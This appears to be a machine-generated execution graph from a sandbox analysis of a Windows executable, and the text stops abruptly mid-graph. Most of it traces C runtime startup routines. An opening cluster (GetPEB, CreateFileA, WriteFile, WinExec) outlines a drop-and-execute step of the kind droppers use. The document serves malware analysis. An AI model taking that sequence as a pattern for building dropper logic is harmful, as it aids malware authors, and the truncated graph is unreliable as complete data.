                                execution_graph 6937 414000 6939 414044 GetPEB 6937->6939 6943 414077 CreateFileA 6939->6943 6941 414265 6942 41422d 6944 414246 WriteFile 6942->6944 6945 414244 6942->6945 6943->6941 6943->6942 6946 414255 CloseHandle WinExec 6944->6946 6945->6946 6946->6941 6947 402495 6948 4024a1 _doexit 6947->6948 6982 406448 HeapCreate 6948->6982 6953 4024fe 6984 405287 GetModuleHandleW 6953->6984 6955 40250f __RTC_Initialize 7018 4032ff 6955->7018 6956 40246c _fast_error_exit 67 API calls 6956->6955 6958 40251e 6959 40252a GetCommandLineA 6958->6959 7104 402164 6958->7104 7033 406311 6959->7033 6966 40254f 7069 405fde 6966->7069 6967 402164 __amsg_exit 67 API calls 6967->6966 6970 402560 7084 402223 6970->7084 6971 402164 __amsg_exit 67 API calls 6971->6970 6973 402568 6974 402573 6973->6974 6976 402164 __amsg_exit 67 API calls 6973->6976 7090 4017b0 6974->7090 6976->6974 6978 4025a2 7111 402400 6978->7111 6981 4025a7 _doexit 6983 4024f2 6982->6983 6983->6953 7096 40246c 6983->7096 6985 4052a2 6984->6985 6986 40529b 6984->6986 6987 40540a 6985->6987 6988 4052ac GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6985->6988 7114 402134 6986->7114 7173 404fa1 6987->7173 6990 4052f5 TlsAlloc 6988->6990 6994 402504 6990->6994 6995 405343 TlsSetValue 6990->6995 6994->6955 6994->6956 6995->6994 6996 405354 6995->6996 7118 40241e 6996->7118 7001 404e77 __encode_pointer 6 API calls 7002 405374 7001->7002 7003 404e77 __encode_pointer 6 API calls 7002->7003 7004 405384 7003->7004 7005 404e77 __encode_pointer 6 API calls 7004->7005 7006 405394 7005->7006 7135 403d4d 7006->7135 7013 404ef2 __decode_pointer 6 API calls 7014 4053e8 7013->7014 7014->6987 7015 4053ef 7014->7015 7155 404fde 7015->7155 7017 4053f7 GetCurrentThreadId 7017->6994 7505 403770 7018->7505 7020 40330b GetStartupInfoA 7021 4039a1 __calloc_crt 67 API calls 7020->7021 7029 40332c 7021->7029 7022 40354a _doexit 7022->6958 7023 403414 7023->7022 7027 403491 7023->7027 7031 40343d GetFileType 7023->7031 7032 405ef7 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7023->7032 7024 4034c7 GetStdHandle 7024->7027 7025 4039a1 __calloc_crt 67 API calls 7025->7029 7026 40352c SetHandleCount 7026->7022 7027->7022 7027->7024 7027->7026 7028 4034d9 GetFileType 7027->7028 7030 405ef7 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7027->7030 7028->7027 7029->7022 7029->7023 7029->7025 7029->7027 7030->7027 7031->7023 7032->7023 7034 40634e 7033->7034 7035 40632f GetEnvironmentStringsW 7033->7035 7036 406337 7034->7036 7037 4063e7 7034->7037 7035->7036 7038 406343 GetLastError 7035->7038 7039 406379 WideCharToMultiByte 7036->7039 7040 40636a GetEnvironmentStringsW 7036->7040 7041 4063f0 GetEnvironmentStrings 7037->7041 7042 40253a 7037->7042 7038->7034 7045 4063dc FreeEnvironmentStringsW 7039->7045 7046 4063ad 7039->7046 7040->7039 7040->7042 7041->7042 7043 406400 7041->7043 7058 406256 7042->7058 7047 40395c __malloc_crt 67 API calls 7043->7047 7045->7042 7048 40395c __malloc_crt 67 API calls 7046->7048 7049 40641a 7047->7049 7050 4063b3 7048->7050 7051 406421 FreeEnvironmentStringsA 7049->7051 7052 40642d ___crtGetEnvironmentStringsA 7049->7052 7050->7045 7053 4063bb WideCharToMultiByte 7050->7053 7051->7042 7056 406437 FreeEnvironmentStringsA 7052->7056 7054 4063d5 7053->7054 7055 4063cd 7053->7055 7054->7045 7057 403a8d __crtLCMapStringA_stat 67 API calls 7055->7057 7056->7042 7057->7054 7059 406270 GetModuleFileNameA 7058->7059 7060 40626b 7058->7060 7062 406297 7059->7062 7512 404b34 7060->7512 7506 4060bc 7062->7506 7064 402544 7064->6966 7064->6967 7066 40395c __malloc_crt 67 API calls 7067 4062d9 7066->7067 7067->7064 7068 4060bc _parse_cmdline 77 API calls 7067->7068 7068->7064 7070 405fe7 7069->7070 7072 405fec _strlen 7069->7072 7071 404b34 ___initmbctable 111 API calls 7070->7071 7071->7072 7073 4039a1 __calloc_crt 67 API calls 7072->7073 7076 402555 7072->7076 7079 406021 _strlen 7073->7079 7074 40607f 7075 403a8d __crtLCMapStringA_stat 67 API calls 7074->7075 7075->7076 7076->6970 7076->6971 7077 4039a1 __calloc_crt 67 API calls 7077->7079 7078 4060a5 7080 403a8d __crtLCMapStringA_stat 67 API calls 7078->7080 7079->7074 7079->7076 7079->7077 7079->7078 7081 408edb _strcpy_s 67 API calls 7079->7081 7082 406066 7079->7082 7080->7076 7081->7079 7082->7079 7083 403594 __invoke_watson 10 API calls 7082->7083 7083->7082 7085 402231 __IsNonwritableInCurrentImage 7084->7085 7923 40599e 7085->7923 7087 40224f __initterm_e 7089 40226e __IsNonwritableInCurrentImage __initterm 7087->7089 7927 40593b 7087->7927 7089->6973 8027 4014e0 GetModuleFileNameA 7090->8027 7092 4017c1 7092->6978 7093 4023d4 7092->7093 7094 4022a8 _doexit 67 API calls 7093->7094 7095 4023e5 7094->7095 7095->6978 7097 40247a 7096->7097 7098 40247f 7096->7098 7099 4057db __FF_MSGBANNER 67 API calls 7097->7099 7100 405630 __NMSG_WRITE 67 API calls 7098->7100 7099->7098 7101 402487 7100->7101 7102 4021b8 _malloc 3 API calls 7101->7102 7103 402491 7102->7103 7103->6953 7105 4057db __FF_MSGBANNER 67 API calls 7104->7105 7106 40216e 7105->7106 7107 405630 __NMSG_WRITE 67 API calls 7106->7107 7108 402176 7107->7108 7109 404ef2 __decode_pointer 6 API calls 7108->7109 7110 402181 7109->7110 7110->6959 7112 4022a8 _doexit 67 API calls 7111->7112 7113 40240b 7112->7113 7113->6981 7115 40213f Sleep GetModuleHandleW 7114->7115 7116 402161 7115->7116 7117 40215d 7115->7117 7116->6985 7117->7115 7117->7116 7179 404ee9 7118->7179 7120 402426 __init_pointers __initp_misc_winsig 7182 405b46 7120->7182 7123 404e77 __encode_pointer 6 API calls 7124 402462 7123->7124 7125 404e77 TlsGetValue 7124->7125 7126 404eb0 GetModuleHandleW 7125->7126 7127 404e8f 7125->7127 7129 404ec0 7126->7129 7130 404ecb GetProcAddress 7126->7130 7127->7126 7128 404e99 TlsGetValue 7127->7128 7133 404ea4 7128->7133 7131 402134 __crt_waiting_on_module_handle 2 API calls 7129->7131 7132 404ea8 7130->7132 7134 404ec6 7131->7134 7132->7001 7133->7126 7133->7132 7134->7130 7134->7132 7137 403d58 7135->7137 7138 403d86 7137->7138 7185 405ef7 7137->7185 7138->6987 7139 404ef2 TlsGetValue 7138->7139 7140 404f0a 7139->7140 7141 404f2b GetModuleHandleW 7139->7141 7140->7141 7142 404f14 TlsGetValue 7140->7142 7143 404f46 GetProcAddress 7141->7143 7144 404f3b 7141->7144 7147 404f1f 7142->7147 7146 404f23 7143->7146 7145 402134 __crt_waiting_on_module_handle 2 API calls 7144->7145 7148 404f41 7145->7148 7146->6987 7149 4039a1 7146->7149 7147->7141 7147->7146 7148->7143 7148->7146 7151 4039aa 7149->7151 7152 4039e7 7151->7152 7153 4039c8 Sleep 7151->7153 7190 403efc 7151->7190 7152->6987 7152->7013 7154 4039dd 7153->7154 7154->7151 7154->7152 7484 403770 7155->7484 7157 404fea GetModuleHandleW 7158 405000 7157->7158 7159 404ffa 7157->7159 7161 405018 GetProcAddress GetProcAddress 7158->7161 7162 40503c 7158->7162 7160 402134 __crt_waiting_on_module_handle 2 API calls 7159->7160 7160->7158 7161->7162 7163 403ec9 __lock 63 API calls 7162->7163 7164 40505b InterlockedIncrement 7163->7164 7485 4050b3 7164->7485 7167 403ec9 __lock 63 API calls 7168 40507c 7167->7168 7488 404c9b InterlockedIncrement 7168->7488 7170 40509a 7500 4050bc 7170->7500 7172 4050a7 _doexit 7172->7017 7174 404fb7 7173->7174 7175 404fab 7173->7175 7177 404fd9 7174->7177 7178 404fcb TlsFree 7174->7178 7176 404ef2 __decode_pointer 6 API calls 7175->7176 7176->7174 7177->7177 7178->7177 7180 404e77 __encode_pointer 6 API calls 7179->7180 7181 404ef0 7180->7181 7181->7120 7183 404e77 __encode_pointer 6 API calls 7182->7183 7184 402458 7183->7184 7184->7123 7189 403770 7185->7189 7187 405f03 InitializeCriticalSectionAndSpinCount 7188 405f47 _doexit 7187->7188 7188->7137 7189->7187 7191 403f08 _doexit 7190->7191 7192 403f3f _memset 7191->7192 7193 403f20 7191->7193 7197 403fb1 HeapAlloc 7192->7197 7200 403f35 _doexit 7192->7200 7209 403ec9 7192->7209 7216 407571 7192->7216 7222 403ff8 7192->7222 7225 405f66 7192->7225 7203 403724 7193->7203 7197->7192 7200->7151 7228 4050c5 GetLastError 7203->7228 7205 403729 7206 4036bc 7205->7206 7207 404ef2 __decode_pointer 6 API calls 7206->7207 7208 4036cc __invoke_watson 7207->7208 7210 403ef1 EnterCriticalSection 7209->7210 7211 403ede 7209->7211 7210->7192 7276 403e06 7211->7276 7213 403ee4 7213->7210 7214 402164 __amsg_exit 66 API calls 7213->7214 7215 403ef0 7214->7215 7215->7210 7219 40759f 7216->7219 7217 407638 7221 407641 7217->7221 7479 407188 7217->7479 7219->7217 7219->7221 7472 4070d8 7219->7472 7221->7192 7483 403def LeaveCriticalSection 7222->7483 7224 403fff 7224->7192 7226 404ef2 __decode_pointer 6 API calls 7225->7226 7227 405f76 7226->7227 7227->7192 7243 404f6d TlsGetValue 7228->7243 7231 405132 SetLastError 7231->7205 7232 4039a1 __calloc_crt 64 API calls 7233 4050f0 7232->7233 7233->7231 7234 4050f8 7233->7234 7235 404ef2 __decode_pointer 6 API calls 7234->7235 7236 40510a 7235->7236 7237 405111 7236->7237 7238 405129 7236->7238 7239 404fde __initptd 64 API calls 7237->7239 7248 403a8d 7238->7248 7241 405119 GetCurrentThreadId 7239->7241 7241->7231 7242 40512f 7242->7231 7244 404f82 7243->7244 7245 404f9d 7243->7245 7246 404ef2 __decode_pointer 6 API calls 7244->7246 7245->7231 7245->7232 7247 404f8d TlsSetValue 7246->7247 7247->7245 7249 403a99 _doexit 7248->7249 7250 403ad8 7249->7250 7251 403b12 __dosmaperr _doexit 7249->7251 7253 403ec9 __lock 65 API calls 7249->7253 7250->7251 7252 403aed HeapFree 7250->7252 7251->7242 7252->7251 7254 403aff 7252->7254 7257 403ab0 ___sbh_find_block 7253->7257 7255 403724 strtoxl 65 API calls 7254->7255 7256 403b04 GetLastError 7255->7256 7256->7251 7258 403aca 7257->7258 7261 406dc2 7257->7261 7268 403ae3 7258->7268 7262 406e01 7261->7262 7267 4070a3 7261->7267 7263 406fed VirtualFree 7262->7263 7262->7267 7264 407051 7263->7264 7265 407060 VirtualFree HeapFree 7264->7265 7264->7267 7271 409c90 7265->7271 7267->7258 7275 403def LeaveCriticalSection 7268->7275 7270 403aea 7270->7250 7272 409ca8 7271->7272 7273 409ccf __VEC_memcpy 7272->7273 7274 409cd7 7272->7274 7273->7274 7274->7267 7275->7270 7277 403e12 _doexit 7276->7277 7278 403e22 7277->7278 7279 403e3a 7277->7279 7304 4057db 7278->7304 7285 403e48 _doexit 7279->7285 7350 40395c 7279->7350 7285->7213 7287 403e69 7291 403ec9 __lock 67 API calls 7287->7291 7288 403e5a 7290 403724 strtoxl 67 API calls 7288->7290 7290->7285 7292 403e70 7291->7292 7294 403ea4 7292->7294 7295 403e78 7292->7295 7297 403a8d __crtLCMapStringA_stat 67 API calls 7294->7297 7296 405ef7 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7295->7296 7298 403e83 7296->7298 7299 403e95 7297->7299 7298->7299 7300 403a8d __crtLCMapStringA_stat 67 API calls 7298->7300 7356 403ec0 7299->7356 7302 403e8f 7300->7302 7303 403724 strtoxl 67 API calls 7302->7303 7303->7299 7359 4096e0 7304->7359 7307 4096e0 __set_error_mode 67 API calls 7310 4057ef 7307->7310 7308 405630 __NMSG_WRITE 67 API calls 7309 405807 7308->7309 7311 405630 __NMSG_WRITE 67 API calls 7309->7311 7310->7308 7312 403e27 7310->7312 7311->7312 7313 405630 7312->7313 7314 405644 7313->7314 7315 403e2e 7314->7315 7316 4096e0 __set_error_mode 64 API calls 7314->7316 7347 4021b8 7315->7347 7317 405666 7316->7317 7318 4057a4 GetStdHandle 7317->7318 7320 4096e0 __set_error_mode 64 API calls 7317->7320 7318->7315 7319 4057b2 _strlen 7318->7319 7319->7315 7323 4057cb WriteFile 7319->7323 7321 405677 7320->7321 7321->7318 7322 405689 7321->7322 7322->7315 7365 408edb 7322->7365 7323->7315 7326 4056bf GetModuleFileNameA 7328 4056dd 7326->7328 7332 405700 _strlen 7326->7332 7330 408edb _strcpy_s 64 API calls 7328->7330 7331 4056ed 7330->7331 7331->7332 7334 403594 __invoke_watson 10 API calls 7331->7334 7333 405743 7332->7333 7381 408e26 7332->7381 7390 408d66 7333->7390 7334->7332 7339 405767 7341 408d66 _strcat_s 64 API calls 7339->7341 7340 403594 __invoke_watson 10 API calls 7340->7339 7343 40577b 7341->7343 7342 403594 __invoke_watson 10 API calls 7342->7333 7344 40578c 7343->7344 7345 403594 __invoke_watson 10 API calls 7343->7345 7399 409577 7344->7399 7345->7344 7437 40218d GetModuleHandleW 7347->7437 7352 403965 7350->7352 7353 40399b 7352->7353 7354 40397c Sleep 7352->7354 7441 406a32 7352->7441 7353->7287 7353->7288 7355 403991 7354->7355 7355->7352 7355->7353 7471 403def LeaveCriticalSection 7356->7471 7358 403ec7 7358->7285 7360 4096ef 7359->7360 7361 403724 strtoxl 67 API calls 7360->7361 7362 4057e2 7360->7362 7363 409712 7361->7363 7362->7307 7362->7310 7364 4036bc strtoxl 6 API calls 7363->7364 7364->7362 7366 408eec 7365->7366 7369 408ef3 7365->7369 7366->7369 7372 408f19 7366->7372 7367 403724 strtoxl 67 API calls 7368 408ef8 7367->7368 7370 4036bc strtoxl 6 API calls 7368->7370 7369->7367 7371 4056ab 7370->7371 7371->7326 7374 403594 7371->7374 7372->7371 7373 403724 strtoxl 67 API calls 7372->7373 7373->7368 7426 401ae0 7374->7426 7376 4035c1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7377 403691 __invoke_watson 7376->7377 7378 40369d GetCurrentProcess TerminateProcess 7376->7378 7377->7378 7428 401ee2 7378->7428 7380 4036ba 7380->7326 7385 408e38 7381->7385 7382 408e3c 7383 403724 strtoxl 67 API calls 7382->7383 7384 405730 7382->7384 7389 408e58 7383->7389 7384->7333 7384->7342 7385->7382 7385->7384 7387 408e82 7385->7387 7386 4036bc strtoxl 6 API calls 7386->7384 7387->7384 7388 403724 strtoxl 67 API calls 7387->7388 7388->7389 7389->7386 7391 408d7e 7390->7391 7394 408d77 7390->7394 7392 403724 strtoxl 67 API calls 7391->7392 7393 408d83 7392->7393 7395 4036bc strtoxl 6 API calls 7393->7395 7394->7391 7397 408db2 7394->7397 7396 405756 7395->7396 7396->7339 7396->7340 7397->7396 7398 403724 strtoxl 67 API calls 7397->7398 7398->7393 7400 404ee9 ___crtMessageBoxW 6 API calls 7399->7400 7401 409587 7400->7401 7402 40959a LoadLibraryA 7401->7402 7404 409622 7401->7404 7403 4095af GetProcAddress 7402->7403 7412 4096c4 7402->7412 7405 4095c5 7403->7405 7403->7412 7408 404ef2 __decode_pointer 6 API calls 7404->7408 7422 40964c 7404->7422 7409 404e77 __encode_pointer 6 API calls 7405->7409 7406 404ef2 __decode_pointer 6 API calls 7406->7412 7407 404ef2 __decode_pointer 6 API calls 7418 40968f 7407->7418 7410 40963f 7408->7410 7411 4095cb GetProcAddress 7409->7411 7413 404ef2 __decode_pointer 6 API calls 7410->7413 7414 404e77 __encode_pointer 6 API calls 7411->7414 7412->7315 7413->7422 7415 4095e0 GetProcAddress 7414->7415 7416 404e77 __encode_pointer 6 API calls 7415->7416 7417 4095f5 GetProcAddress 7416->7417 7419 404e77 __encode_pointer 6 API calls 7417->7419 7421 404ef2 __decode_pointer 6 API calls 7418->7421 7424 409677 7418->7424 7420 40960a 7419->7420 7420->7404 7423 409614 GetProcAddress 7420->7423 7421->7424 7422->7407 7422->7424 7425 404e77 __encode_pointer 6 API calls 7423->7425 7424->7406 7425->7404 7427 401aec __VEC_memzero 7426->7427 7427->7376 7429 401eea 7428->7429 7430 401eec IsDebuggerPresent 7428->7430 7429->7380 7436 406885 7430->7436 7433 404436 SetUnhandledExceptionFilter UnhandledExceptionFilter 7434 404453 __invoke_watson 7433->7434 7435 40445b GetCurrentProcess TerminateProcess 7433->7435 7434->7435 7435->7380 7436->7433 7438 4021a1 GetProcAddress 7437->7438 7439 4021b6 ExitProcess 7437->7439 7438->7439 7440 4021b1 7438->7440 7440->7439 7442 406ae5 7441->7442 7453 406a44 7441->7453 7443 405f66 _malloc 6 API calls 7442->7443 7444 406aeb 7443->7444 7446 403724 strtoxl 66 API calls 7444->7446 7445 4057db __FF_MSGBANNER 66 API calls 7447 406a55 7445->7447 7458 406add 7446->7458 7447->7445 7448 405630 __NMSG_WRITE 66 API calls 7447->7448 7450 406aa1 HeapAlloc 7447->7450 7451 4021b8 _malloc 3 API calls 7447->7451 7447->7453 7448->7447 7450->7453 7451->7447 7452 406ad1 7455 403724 strtoxl 66 API calls 7452->7455 7453->7447 7453->7452 7454 405f66 _malloc 6 API calls 7453->7454 7456 406ad6 7453->7456 7453->7458 7459 4069e3 7453->7459 7454->7453 7455->7456 7457 403724 strtoxl 66 API calls 7456->7457 7457->7458 7458->7352 7460 4069ef _doexit 7459->7460 7461 406a20 _doexit 7460->7461 7462 403ec9 __lock 67 API calls 7460->7462 7461->7453 7463 406a05 7462->7463 7464 407571 ___sbh_alloc_block 5 API calls 7463->7464 7465 406a10 7464->7465 7467 406a29 7465->7467 7470 403def LeaveCriticalSection 7467->7470 7469 406a30 7469->7461 7470->7469 7471->7358 7473 4070eb HeapReAlloc 7472->7473 7474 40711f HeapAlloc 7472->7474 7475 407109 7473->7475 7476 40710d 7473->7476 7474->7475 7477 407142 VirtualAlloc 7474->7477 7475->7217 7476->7474 7477->7475 7478 40715c HeapFree 7477->7478 7478->7475 7480 40719f VirtualAlloc 7479->7480 7482 4071e6 7480->7482 7482->7221 7483->7224 7484->7157 7503 403def LeaveCriticalSection 7485->7503 7487 405075 7487->7167 7489 404cb9 InterlockedIncrement 7488->7489 7490 404cbc 7488->7490 7489->7490 7491 404cc6 InterlockedIncrement 7490->7491 7492 404cc9 7490->7492 7491->7492 7493 404cd3 InterlockedIncrement 7492->7493 7494 404cd6 7492->7494 7493->7494 7495 404ce0 InterlockedIncrement 7494->7495 7496 404ce3 7494->7496 7495->7496 7497 404cfc InterlockedIncrement 7496->7497 7498 404d0c InterlockedIncrement 7496->7498 7499 404d17 InterlockedIncrement 7496->7499 7497->7496 7498->7496 7499->7170 7504 403def LeaveCriticalSection 7500->7504 7502 4050c3 7502->7172 7503->7487 7504->7502 7505->7020 7508 4060db 7506->7508 7510 406148 7508->7510 7516 404334 7508->7516 7509 406246 7509->7064 7509->7066 7510->7509 7511 404334 77 API calls __splitpath_helper 7510->7511 7511->7510 7513 404b3d 7512->7513 7514 404b44 7512->7514 7738 40499a 7513->7738 7514->7059 7519 4042c8 7516->7519 7522 401ef1 7519->7522 7521 4042db 7521->7508 7523 401f04 7522->7523 7529 401f51 7522->7529 7530 40513e 7523->7530 7526 401f31 7526->7529 7550 404695 7526->7550 7529->7521 7531 4050c5 __getptd_noexit 67 API calls 7530->7531 7532 405146 7531->7532 7533 402164 __amsg_exit 67 API calls 7532->7533 7534 401f09 7532->7534 7533->7534 7534->7526 7535 404e01 7534->7535 7536 404e0d _doexit 7535->7536 7537 40513e __getptd 67 API calls 7536->7537 7538 404e12 7537->7538 7539 404e40 7538->7539 7541 404e24 7538->7541 7540 403ec9 __lock 67 API calls 7539->7540 7542 404e47 7540->7542 7543 40513e __getptd 67 API calls 7541->7543 7566 404dc3 7542->7566 7545 404e29 7543->7545 7548 402164 __amsg_exit 67 API calls 7545->7548 7549 404e37 _doexit 7545->7549 7548->7549 7549->7526 7551 4046a1 _doexit 7550->7551 7552 40513e __getptd 67 API calls 7551->7552 7553 4046a6 7552->7553 7554 403ec9 __lock 67 API calls 7553->7554 7561 4046b8 7553->7561 7555 4046d6 7554->7555 7556 40471f 7555->7556 7559 404707 InterlockedIncrement 7555->7559 7560 4046ed InterlockedDecrement 7555->7560 7734 404730 7556->7734 7557 402164 __amsg_exit 67 API calls 7562 4046c6 _doexit 7557->7562 7559->7556 7560->7559 7563 4046f8 7560->7563 7561->7557 7561->7562 7562->7529 7563->7559 7564 403a8d __crtLCMapStringA_stat 67 API calls 7563->7564 7565 404706 7564->7565 7565->7559 7567 404dc7 7566->7567 7573 404df9 7566->7573 7568 404c9b ___addlocaleref 8 API calls 7567->7568 7567->7573 7569 404dda 7568->7569 7569->7573 7577 404d2a 7569->7577 7574 404e6b 7573->7574 7733 403def LeaveCriticalSection 7574->7733 7576 404e72 7576->7545 7578 404d3b InterlockedDecrement 7577->7578 7579 404dbe 7577->7579 7580 404d50 InterlockedDecrement 7578->7580 7581 404d53 7578->7581 7579->7573 7591 404b52 7579->7591 7580->7581 7582 404d60 7581->7582 7583 404d5d InterlockedDecrement 7581->7583 7584 404d6a InterlockedDecrement 7582->7584 7585 404d6d 7582->7585 7583->7582 7584->7585 7586 404d77 InterlockedDecrement 7585->7586 7588 404d7a 7585->7588 7586->7588 7587 404d93 InterlockedDecrement 7587->7588 7588->7587 7589 404da3 InterlockedDecrement 7588->7589 7590 404dae InterlockedDecrement 7588->7590 7589->7588 7590->7579 7592 404bd6 7591->7592 7596 404b69 7591->7596 7594 403a8d __crtLCMapStringA_stat 67 API calls 7592->7594 7595 404c23 7592->7595 7593 404c4a 7601 404c8f 7593->7601 7616 403a8d 67 API calls __crtLCMapStringA_stat 7593->7616 7597 404bf7 7594->7597 7595->7593 7645 408afe 7595->7645 7596->7592 7603 403a8d __crtLCMapStringA_stat 67 API calls 7596->7603 7605 404b9d 7596->7605 7599 403a8d __crtLCMapStringA_stat 67 API calls 7597->7599 7604 404c0a 7599->7604 7607 403a8d __crtLCMapStringA_stat 67 API calls 7601->7607 7602 403a8d __crtLCMapStringA_stat 67 API calls 7602->7593 7608 404b92 7603->7608 7609 403a8d __crtLCMapStringA_stat 67 API calls 7604->7609 7610 403a8d __crtLCMapStringA_stat 67 API calls 7605->7610 7620 404bbe 7605->7620 7606 403a8d __crtLCMapStringA_stat 67 API calls 7611 404bcb 7606->7611 7612 404c95 7607->7612 7621 408cd8 7608->7621 7614 404c18 7609->7614 7615 404bb3 7610->7615 7617 403a8d __crtLCMapStringA_stat 67 API calls 7611->7617 7612->7573 7618 403a8d __crtLCMapStringA_stat 67 API calls 7614->7618 7637 408c93 7615->7637 7616->7593 7617->7592 7618->7595 7620->7606 7622 408ce5 7621->7622 7636 408d62 7621->7636 7623 403a8d __crtLCMapStringA_stat 67 API calls 7622->7623 7624 408cf6 7622->7624 7623->7624 7625 408d08 7624->7625 7626 403a8d __crtLCMapStringA_stat 67 API calls 7624->7626 7627 408d1a 7625->7627 7629 403a8d __crtLCMapStringA_stat 67 API calls 7625->7629 7626->7625 7628 408d2c 7627->7628 7630 403a8d __crtLCMapStringA_stat 67 API calls 7627->7630 7631 408d3e 7628->7631 7632 403a8d __crtLCMapStringA_stat 67 API calls 7628->7632 7629->7627 7630->7628 7633 408d50 7631->7633 7634 403a8d __crtLCMapStringA_stat 67 API calls 7631->7634 7632->7631 7635 403a8d __crtLCMapStringA_stat 67 API calls 7633->7635 7633->7636 7634->7633 7635->7636 7636->7605 7638 408ca0 7637->7638 7644 408cd4 7637->7644 7639 408cb0 7638->7639 7640 403a8d __crtLCMapStringA_stat 67 API calls 7638->7640 7641 408cc2 7639->7641 7642 403a8d __crtLCMapStringA_stat 67 API calls 7639->7642 7640->7639 7643 403a8d __crtLCMapStringA_stat 67 API calls 7641->7643 7641->7644 7642->7641 7643->7644 7644->7620 7646 408b0f 7645->7646 7732 404c43 7645->7732 7647 403a8d __crtLCMapStringA_stat 67 API calls 7646->7647 7648 408b17 7647->7648 7649 403a8d __crtLCMapStringA_stat 67 API calls 7648->7649 7650 408b1f 7649->7650 7651 403a8d __crtLCMapStringA_stat 67 API calls 7650->7651 7652 408b27 7651->7652 7653 403a8d __crtLCMapStringA_stat 67 API calls 7652->7653 7654 408b2f 7653->7654 7655 403a8d __crtLCMapStringA_stat 67 API calls 7654->7655 7656 408b37 7655->7656 7657 403a8d __crtLCMapStringA_stat 67 API calls 7656->7657 7658 408b3f 7657->7658 7659 403a8d __crtLCMapStringA_stat 67 API calls 7658->7659 7660 408b46 7659->7660 7661 403a8d __crtLCMapStringA_stat 67 API calls 7660->7661 7662 408b4e 7661->7662 7663 403a8d __crtLCMapStringA_stat 67 API calls 7662->7663 7664 408b56 7663->7664 7665 403a8d __crtLCMapStringA_stat 67 API calls 7664->7665 7666 408b5e 7665->7666 7667 403a8d __crtLCMapStringA_stat 67 API calls 7666->7667 7668 408b66 7667->7668 7669 403a8d __crtLCMapStringA_stat 67 API calls 7668->7669 7670 408b6e 7669->7670 7671 403a8d __crtLCMapStringA_stat 67 API calls 7670->7671 7672 408b76 7671->7672 7673 403a8d __crtLCMapStringA_stat 67 API calls 7672->7673 7674 408b7e 7673->7674 7675 403a8d __crtLCMapStringA_stat 67 API calls 7674->7675 7676 408b86 7675->7676 7677 403a8d __crtLCMapStringA_stat 67 API calls 7676->7677 7678 408b8e 7677->7678 7679 403a8d __crtLCMapStringA_stat 67 API calls 7678->7679 7680 408b99 7679->7680 7681 403a8d __crtLCMapStringA_stat 67 API calls 7680->7681 7682 408ba1 7681->7682 7683 403a8d __crtLCMapStringA_stat 67 API calls 7682->7683 7684 408ba9 7683->7684 7685 403a8d __crtLCMapStringA_stat 67 API calls 7684->7685 7686 408bb1 7685->7686 7687 403a8d __crtLCMapStringA_stat 67 API calls 7686->7687 7688 408bb9 7687->7688 7689 403a8d __crtLCMapStringA_stat 67 API calls 7688->7689 7690 408bc1 7689->7690 7691 403a8d __crtLCMapStringA_stat 67 API calls 7690->7691 7692 408bc9 7691->7692 7693 403a8d __crtLCMapStringA_stat 67 API calls 7692->7693 7694 408bd1 7693->7694 7695 403a8d __crtLCMapStringA_stat 67 API calls 7694->7695 7696 408bd9 7695->7696 7697 403a8d __crtLCMapStringA_stat 67 API calls 7696->7697 7698 408be1 7697->7698 7699 403a8d __crtLCMapStringA_stat 67 API calls 7698->7699 7700 408be9 7699->7700 7701 403a8d __crtLCMapStringA_stat 67 API calls 7700->7701 7702 408bf1 7701->7702 7703 403a8d __crtLCMapStringA_stat 67 API calls 7702->7703 7704 408bf9 7703->7704 7705 403a8d __crtLCMapStringA_stat 67 API calls 7704->7705 7706 408c01 7705->7706 7707 403a8d __crtLCMapStringA_stat 67 API calls 7706->7707 7708 408c09 7707->7708 7709 403a8d __crtLCMapStringA_stat 67 API calls 7708->7709 7710 408c11 7709->7710 7711 403a8d __crtLCMapStringA_stat 67 API calls 7710->7711 7712 408c1f 7711->7712 7713 403a8d __crtLCMapStringA_stat 67 API calls 7712->7713 7714 408c2a 7713->7714 7715 403a8d __crtLCMapStringA_stat 67 API calls 7714->7715 7716 408c35 7715->7716 7717 403a8d __crtLCMapStringA_stat 67 API calls 7716->7717 7718 408c40 7717->7718 7719 403a8d __crtLCMapStringA_stat 67 API calls 7718->7719 7720 408c4b 7719->7720 7721 403a8d __crtLCMapStringA_stat 67 API calls 7720->7721 7722 408c56 7721->7722 7723 403a8d __crtLCMapStringA_stat 67 API calls 7722->7723 7724 408c61 7723->7724 7725 403a8d __crtLCMapStringA_stat 67 API calls 7724->7725 7726 408c6c 7725->7726 7727 403a8d __crtLCMapStringA_stat 67 API calls 7726->7727 7728 408c77 7727->7728 7729 403a8d __crtLCMapStringA_stat 67 API calls 7728->7729 7730 408c82 7729->7730 7731 403a8d __crtLCMapStringA_stat 67 API calls 7730->7731 7731->7732 7732->7602 7733->7576 7737 403def LeaveCriticalSection 7734->7737 7736 404737 7736->7561 7737->7736 7739 4049a6 _doexit 7738->7739 7740 40513e __getptd 67 API calls 7739->7740 7741 4049af 7740->7741 7742 404695 _LocaleUpdate::_LocaleUpdate 69 API calls 7741->7742 7743 4049b9 7742->7743 7769 404739 7743->7769 7746 40395c __malloc_crt 67 API calls 7748 4049da 7746->7748 7747 404af9 _doexit 7747->7514 7748->7747 7776 4047b5 7748->7776 7751 404b06 7751->7747 7755 404b19 7751->7755 7757 403a8d __crtLCMapStringA_stat 67 API calls 7751->7757 7752 404a0a InterlockedDecrement 7753 404a1a 7752->7753 7754 404a2b InterlockedIncrement 7752->7754 7753->7754 7759 403a8d __crtLCMapStringA_stat 67 API calls 7753->7759 7754->7747 7756 404a41 7754->7756 7758 403724 strtoxl 67 API calls 7755->7758 7756->7747 7760 403ec9 __lock 67 API calls 7756->7760 7757->7755 7758->7747 7761 404a2a 7759->7761 7763 404a55 InterlockedDecrement 7760->7763 7761->7754 7764 404ad1 7763->7764 7765 404ae4 InterlockedIncrement 7763->7765 7764->7765 7767 403a8d __crtLCMapStringA_stat 67 API calls 7764->7767 7786 404afb 7765->7786 7768 404ae3 7767->7768 7768->7765 7770 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7769->7770 7771 40474d 7770->7771 7772 404776 7771->7772 7773 404758 GetOEMCP 7771->7773 7774 40477b GetACP 7772->7774 7775 404768 7772->7775 7773->7775 7774->7775 7775->7746 7775->7747 7777 404739 getSystemCP 79 API calls 7776->7777 7778 4047d5 7777->7778 7779 4047e0 setSBCS 7778->7779 7782 404824 IsValidCodePage 7778->7782 7784 404849 _memset 